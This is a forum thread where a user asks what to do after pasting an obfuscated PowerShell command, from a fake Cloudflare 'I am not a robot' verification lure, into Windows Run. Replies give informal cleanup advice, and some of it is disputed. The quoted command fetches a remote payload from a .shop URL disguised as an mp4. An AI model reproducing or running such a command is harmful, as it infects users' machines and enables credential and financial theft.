I accidentally executed
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''
via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.
What should I do? is full system wipe necessary? or can I remove it somehow?
If I need to do a system format what about attached drives and other devices on the network?
U got a virus. Anything from a crypto miner to a password/credit card stealer.
Turn off the effected computer pull put the drive plug it into a separate computer as a secondary drive. Pull the data u need off the drive and make a backup. Then wipe the old system full reset(update BIOS if ur really paranoid). Then copy over ur backed up data. Do not copy any executable file from the infected drive.
Go change ALL ur passwords that u ever saved on that computer. And watch ur bank statements like a hawk.
Don’t do this - plugging in an infected drive can infect the secondary computer; you may wish to plug it into a linux or other hardened system to get the data however. The post by @silverdiamond is a better response.
I highly doubt some random malware has the capacity to reprogramme the firmware to do some rubber ducky type shit.
Late response, sorry - but I don’t see why not? I mean… this is part of the standard plug-in module system available in most malware creation tool-kits, so it should be assumed that USB drives of unknown provenance will either 1) contain malware as part of the USB auto-run (Now not used very often, but can infect older computers), or 2) part of the USB firmware just as standard operating procedure.